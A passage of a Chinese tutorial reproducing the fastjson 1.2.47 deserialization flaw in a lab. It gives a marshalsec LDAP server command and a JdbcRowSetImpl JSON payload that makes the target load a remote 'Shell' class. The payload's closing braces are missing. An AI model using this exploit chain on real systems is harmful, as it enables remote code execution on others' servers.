『』fastjson1.2.47反序列化漏洞复现( 二 )
本文插图
接下来使用marshalsec工具快捷的开启LDAP服务 。 借助LDAP服务将LDAP reference result 重定向到web服务器 。
这里的ip和端口 , 是你web服务的ip端口
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip:8090#Shell 1389
本文插图
payload:
{
''a'':{
''@type'':''java.lang.Class'',
''val'':''com.sun.rowset.JdbcRowSetImpl''
},
''b'':{
''@type'':''com.sun.rowset.JdbcRowSetImpl'',
''dataSourceName'':''ldap://ip:1389/Shell'',
''autoCommit'':true
本文插图
本文插图
本文插图
No.5 坑点
1.主机A需要关闭防火墙 , 否则无法使用LDAP服务 systemctl stop firewalld;
2.防火墙关闭 , 需要重启docker service docker restart 漏洞环境也需要重新启动一下;
3.jdk版本需要注意 , 下方图片jdk版本不存在此漏洞 。
本文插图
本文插图
- 案例分析:用UEBA解决Equifax的失陷凭证问题
- 美国政府问责办公室(GAO)报告|国防部并没有解决基本网络安全盲点 遭GAO批评
- CISO数据安全分级分类实践指南
- Windows严重蠕虫漏洞将破坏全球的商业网络!
- 国泰航空被处以ICO50万英镑最高罚款 因数据泄露长达四年之久
本文插图
推荐阅读
- 小丰自媒体|Apple与Android系统齐现漏洞?
- 超能网|苹果发布iOS 13.5.1系统更新:封堵unc0ver越狱漏洞
- 漏洞|【苹果为ID验证漏洞,支付十万美元赏金】
- 威锋网|研究人员发现「使用Apple登录」功能存在安全漏洞
- 太平洋电脑网|不测不知道 这么多的USB漏洞要从何“补”起?
- 超能网|新装置发现26个USB漏洞,Linux占了18个
- 漏洞|安卓系统曝出高危漏洞,超90%用户设备被波及!
- 前瞻网|碰瓷?自称因FaceTime漏洞致手机被黑,哥伦比亚名人要求苹果赔偿26亿美元
- #漏洞#Android 9.0等低版本系统被发现存在StrandHogg 2.0漏洞
- 华为华为可以让代工厂直接发货给客户?美官员称将警惕新规漏洞